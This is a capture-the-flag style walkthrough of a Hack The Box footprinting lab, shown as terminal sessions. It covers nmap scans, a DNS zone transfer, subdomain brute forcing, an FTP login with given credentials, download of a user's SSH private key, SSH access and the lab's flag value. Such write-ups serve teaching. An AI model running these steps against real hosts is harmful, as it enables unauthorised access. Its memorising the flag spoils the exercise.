Footprinting Lab - Easy
Last updated
Last updated
┌─[root@parrot]─[/home/z3tssu]
└──╼ nmap 10.129.122.64
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-07 20:12 +04
Nmap scan report for 10.129.122.64
Host is up (0.30s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
2121/tcp open ccproxy-ftp
Nmap done: 1 IP address (1 host up) scanned in 36.13 seconds
┌─[✗]─[root@parrot]─[/home/z3tssu]
└──╼ nmap 10.129.122.64 -sV -sC -p21,22,53,2121
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-07 20:16 +04
Nmap scan report for 10.129.122.64
Host is up (0.29s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp
| fingerprint-strings:
| GenericLines:
| 220 ProFTPD Server (ftp.int.inlanefreight.htb) [10.129.122.64]
| Invalid command: try being more creative
|_ Invalid command: try being more creative
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 3f:4c:8f:10:f1:ae:be:cd:31:24:7c:a1:4e:ab:84:6d (RSA)
| 256 7b:30:37:67:50:b9:ad:91:c0:8f:f7:02:78:3b:7c:02 (ECDSA)
|_ 256 88:9e:0e:07:fe:ca:d0:5c:60:ab:cf:10:99:cd:6c:a7 (ED25519)
53/tcp open domain ISC BIND 9.16.1 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.16.1-Ubuntu
2121/tcp open ftp
| fingerprint-strings:
| GenericLines:
| 220 ProFTPD Server (Ceil's FTP) [10.129.122.64]
| Invalid command: try being more creative
|_ Invalid command: try being more creative
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port21-TCP:V=7.94SVN%I=7%D=3/7%Time=67CB1BF2%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,9C,"220\x20ProFTPD\x20Server\x20\(ftp\.int\.inlanefreight\.h
SF:tb\)\x20\[10\.129\.122\.64\]\r\n500\x20Invalid\x20command:\x20try\x20be
SF:ing\x20more\x20creative\r\n500\x20Invalid\x20command:\x20try\x20being\x
SF:20more\x20creative\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port2121-TCP:V=7.94SVN%I=7%D=3/7%Time=67CB1BF2%P=x86_64-pc-linux-gnu%r(
SF:GenericLines,8D,"220\x20ProFTPD\x20Server\x20\(Ceil's\x20FTP\)\x20\[10\
SF:.129\.122\.64\]\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x
SF:20creative\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x20cre
SF:ative\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 109.45 seconds┌─[root@parrot]─[/home/z3tssu]
└──╼ #dig axfr inlanefreight.htb @10.129.75.47
; <<>> DiG 9.18.33-1~deb12u2-Debian <<>> axfr inlanefreight.htb @10.129.75.47
;; global options: +cmd
inlanefreight.htb. 604800 IN SOA inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
inlanefreight.htb. 604800 IN TXT "MS=ms97310371"
inlanefreight.htb. 604800 IN TXT "atlassian-domain-verification=t1rKCy68JFszSdCKVpw64A1QksWdXuYFUeSXKU"
inlanefreight.htb. 604800 IN TXT "v=spf1 include:mailgun.org include:_spf.google.com include:spf.protection.outlook.com include:_spf.atlassian.net ip4:10.129.124.8 ip4:10.129.127.2 ip4:10.129.42.106 ~all"
inlanefreight.htb. 604800 IN NS ns.inlanefreight.htb.
app.inlanefreight.htb. 604800 IN A 10.129.18.15
internal.inlanefreight.htb. 604800 IN A 10.129.1.6
mail1.inlanefreight.htb. 604800 IN A 10.129.18.201
ns.inlanefreight.htb. 604800 IN A 10.129.34.136
inlanefreight.htb. 604800 IN SOA inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
;; Query time: 319 msec
;; SERVER: 10.129.75.47#53(10.129.75.47) (TCP)
;; WHEN: Sat Mar 08 17:09:16 +04 2025
;; XFR size: 10 records (messages 1, bytes 540)
dnsenum --dnsserver STMIP --enum -p 0 -s 0 -f /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt internal.inlanefreight.htb----- internal.inlanefreight.htb -----
Host's addresses:
__________________
Name Servers:
______________
ns.inlanefreight.htb. 604800 IN A 10.129.34.136
Mail (MX) Servers:
___________________
Trying Zone Transfers and getting Bind Versions:
_________________________________________________
unresolvable name: ns.inlanefreight.htb at /usr/bin/dnsenum line 900 thread 2.
Trying Zone Transfer for internal.inlanefreight.htb on ns.inlanefreight.htb ...
AXFR record query failed: no nameservers
Brute forcing with /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt:
________________________________________________________________________________________________
ftp.internal.inlanefreight.htb. 604800 IN A 127.0.0.1
ns.internal.inlanefreight.htb. 604800 IN A 10.129.34.136
vpn.internal.inlanefreight.htb. 604800 IN A 10.129.1.6
mail1.internal.inlanefreight.htb. 604800 IN A 10.129.18.200
wsus.internal.inlanefreight.htb. 604800 IN A 10.129.18.2
ws1.internal.inlanefreight.htb. 604800 IN A 10.129.1.34oot@parrot]─[/home/z3tssu/HTB/footprint/easy]
└──╼ #cat /etc/hosts
# Host addresses
127.0.0.1 localhost
127.0.1.1 parrot
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.129.75.47 internal.inlanefreight.htb
10.129.75.47 ftp.internal.inlanefreight.htb
10.129.42.249 gettingstarted.htb
# Others
┌─[root@parrot]─[/home/z3tssu/HTB/footprint/easy]
┌─[root@parrot]─[/home/z3tssu/HTB/footprint/easy]
└──╼ #nmap -T4 ftp.internal.inlanefreight.htb
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-08 17:31 +04
Nmap scan report for ftp.internal.inlanefreight.htb (10.129.75.47)
Host is up (0.33s latency).
rDNS record for 10.129.75.47: internal.inlanefreight.htb
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
2121/tcp open ccproxy-ftp
Nmap done: 1 IP address (1 host up) scanned in 2.82 secondneed to recall the details written in the assessment's lab scenario. Specifically, that the credentials ceil:qwer1234
┌─[root@parrot]─[/home/z3tssu/HTB/footprint/easy]
└──╼ #ftp ftp.internal.inlanefreight.htb 2121
Connected to ftp.internal.inlanefreight.htb.
220 ProFTPD Server (Ceil's FTP) [10.129.75.47]
Name (ftp.internal.inlanefreight.htb:z3tssu): ceil
331 Password required for ceil
Password:
230 User ceil logged in
Remote system type is UNIX.
Using binary mode to transfer files.ftp> ls -la
229 Entering Extended Passive Mode (|||4766|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x 4 ceil ceil 4096 Nov 10 2021 .
drwxr-xr-x 4 ceil ceil 4096 Nov 10 2021 ..
-rw------- 1 ceil ceil 294 Nov 10 2021 .bash_history
-rw-r--r-- 1 ceil ceil 220 Nov 10 2021 .bash_logout
-rw-r--r-- 1 ceil ceil 3771 Nov 10 2021 .bashrc
drwx------ 2 ceil ceil 4096 Nov 10 2021 .cache
-rw-r--r-- 1 ceil ceil 807 Nov 10 2021 .profile
drwx------ 2 ceil ceil 4096 Nov 10 2021 .ssh
-rw------- 1 ceil ceil 759 Nov 10 2021 .viminfo
226 Transfer complete
ftp> cd .ssh
250 CWD command successful
ftp> ls -la
229 Entering Extended Passive Mode (|||48089|)
150 Opening ASCII mode data connection for file list
drwx------ 2 ceil ceil 4096 Nov 10 2021 .
drwxr-xr-x 4 ceil ceil 4096 Nov 10 2021 ..
-rw-rw-r-- 1 ceil ceil 738 Nov 10 2021 authorized_keys
-rw------- 1 ceil ceil 3381 Nov 10 2021 id_rsa
-rw-r--r-- 1 ceil ceil 738 Nov 10 2021 id_rsa.pub
226 Transfer complete
ftp> get id_rsa
local: id_rsa remote: id_rsa
229 Entering Extended Passive Mode (|||63095|)
150 Opening BINARY mode data connection for id_rsa (3381 bytes)
100% |*************************************************| 3381 16.96 MiB/s 00:00 ETA
226 Transfer complete
3381 bytes received in 00:00 (8.33 KiB/s)
After you ahve downlaoded the id_rsa from the server, it will be stored on that attacker machine
chmod 600 id_rsa┌─[root@parrot]─[/home/z3tssu/HTB/footprint/easy]
└──╼ #ssh ceil@10.129.75.47 -i id_rsa
The authenticity of host '10.129.75.47 (10.129.75.47)' can't be established.
ED25519 key fingerprint is SHA256:AtNYHXCA7dVpi58LB+uuPe9xvc2lJwA6y7q82kZoBNM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.75.47' (ED25519) to the list of known hosts.
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-90-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sat 08 Mar 2025 01:42:12 PM UTC
System load: 0.0 Processes: 161
Usage of /: 86.7% of 3.87GB Users logged in: 0
Memory usage: 12% IPv4 address for ens192: 10.129.75.47
Swap usage: 0%
=> / is using 86.7% of 3.87GB
118 updates can be installed immediately.
1 of these updates is a security update.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Wed Nov 10 05:48:02 2021 from 10.10.14.20
ceil@NIXEASY:~$ceil@NIXEASY:~$ ls -la
total 36
drwxr-xr-x 4 ceil ceil 4096 Nov 10 2021 .
drwxr-xr-x 5 root root 4096 Nov 10 2021 ..
-rw------- 1 ceil ceil 294 Nov 10 2021 .bash_history
-rw-r--r-- 1 ceil ceil 220 Nov 10 2021 .bash_logout
-rw-r--r-- 1 ceil ceil 3771 Nov 10 2021 .bashrc
drwx------ 2 ceil ceil 4096 Nov 10 2021 .cache
-rw-r--r-- 1 ceil ceil 807 Nov 10 2021 .profile
drwx------ 2 ceil ceil 4096 Nov 10 2021 .ssh
-rw------- 1 ceil ceil 759 Nov 10 2021 .viminfo
ceil@NIXEASY:~$ pwd
/home/ceil
ceil@NIXEASY:~$ cd /home
ceil@NIXEASY:/home$ ls
ceil cry0l1t3 flag
ceil@NIXEASY:/home$ cd flag
ceil@NIXEASY:/home/flag$ ls
flag.txt
ceil@NIXEASY:/home/flag$ cat flag.txt
HTB{7nrzise7hednrxihskjed7nzrgkweunj47zngrhdbkjhgdfbjkc7hgj}
ceil@NIXEASY:/home/flag$